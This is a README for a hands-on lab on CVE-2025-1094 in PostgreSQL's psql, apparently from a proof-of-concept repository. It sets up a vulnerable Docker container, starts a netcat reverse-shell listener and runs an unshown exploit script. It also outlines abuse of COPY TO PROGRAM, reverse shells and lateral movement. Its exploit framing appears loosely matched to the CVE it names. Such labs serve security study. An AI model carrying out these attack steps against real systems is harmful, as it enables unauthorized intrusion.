# 🛠️ CVE-2025-1094 Lab Setup
> ⚠️ **Disclaimer**
> This lab is for **educational and research purposes only**.
> Do **NOT** use any of the information or techniques demonstrated here on systems you do not own or have explicit permission to test. Unauthorized use of these methods **may violate laws** and result in severe penalties.
---
## 📌 Overview
**CVE-2025-1094** is a critical vulnerability affecting **PostgreSQL**’s interactive tool **`psql`**, discovered in version **14.15** and earlier.
It allows attackers to perform **SQL Injection** which can lead to **Remote Code Execution (RCE)** under certain conditions.
---
## 🧨 Root Cause
The vulnerability arises from **improper handling of malformed UTF-8 input** in `psql`.
Due to insufficient validation, attackers can inject arbitrary SQL or meta-commands like `!` (shell escape), and even exploit `COPY ... TO PROGRAM` to run system commands.
---
## 🔥 Impact and Attack Scenarios
- **SQL Injection → RCE**: Malformed UTF-8 strings bypass validation and lead to arbitrary query execution.
- **Abuse of `COPY TO PROGRAM`**: Attackers can execute arbitrary shell commands such as:
- Reverse shells
- Reading sensitive files (`/etc/passwd`)
- Combining with other CVEs for full unauthenticated RCE
- **Integration Risk**: Software using `psql` with untrusted input (e.g., BeyondTrust PRA, Remote Support) is particularly exposed.
---
## 🧪 Lab Requirements
### 🐳 Victim (Ubuntu)
Install Docker:
```bash
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER
```
👉 **Reboot** or **log out & log in again** to apply Docker group permissions.
---
### 🐍 Attacker (Kali)
Install Python and dependencies:
```bash
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional
```
✅ Ensure **network connectivity** between attacker and victim machines.
---
## ⚙️ Step 1 – Deploy Vulnerable PostgreSQL Container (Victim)
1. **Pull PostgreSQL 14.15 image**:
```bash
docker pull postgres:14.15
```
2. **Run the container**:
```bash
docker run --name vulnerable_postgres -e POSTGRES_USER=postgres123 -e POSTGRES_PASSWORD=StrongP@ssWord -e POSTGRES_DB=labdb -p 5432:5432 -d postgres:14.15
```
3. **Wait ~5s for initialization**, then create a demo table:
```bash
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
id SERIAL PRIMARY KEY,
username TEXT,
password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF
```
---
### ✅ Step 1.5 – Verify the container and database setup
After starting the container, verify everything is working with the following commands:
**1. Check that the PostgreSQL container is running:**
```bash
sudo docker ps
```
📌 You should see a container named `vulnerable_postgres` listening on port `5432`.
---
**2. Access the container and inspect the database:**
```bash
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb
```
Inside the `psql` shell, run:
```sql
SELECT * FROM users;
```
Expected output:
```
id | username | password
----+----------+-------------
1 | admin | password123
(1 row)
```
Exit from `psql`:
```
\q
```
✅ Now your vulnerable PostgreSQL instance is running and ready for exploitation.
---
**3. Turn the container back on**
```bash
sudo docker start vulnerable_postgres
```
## 📡 Step 2 – Exploit from Attacker Machine
1. **Start a listener** on the attacker machine to catch the reverse shell:
```bash
nc -lvnp 4444
```
2. **Run the exploit script** (adjust IP and port if needed):
```bash
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
```
3. If successful, you’ll receive a reverse shell from the vulnerable PostgreSQL container 🎉
```bash
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.
```
---
## 🧰 Example Exploitation Flow
1. Inject malformed UTF-8 to bypass input validation
2. Exploit `COPY ... TO PROGRAM` to execute arbitrary shell commands
3. Reverse shell connects back to the attacker machine
4. Escalate privileges or move laterally inside the environment
---
💡 **Tip:** You can snapshot this vulnerable container and reuse it later without rebuilding the environment.
[4.0K] /data/pocs/43e1647e9c6b344a5b415dea8766394773856367
├── [1.7K] exploit.py
└── [4.8K] README.md
1 directory, 2 files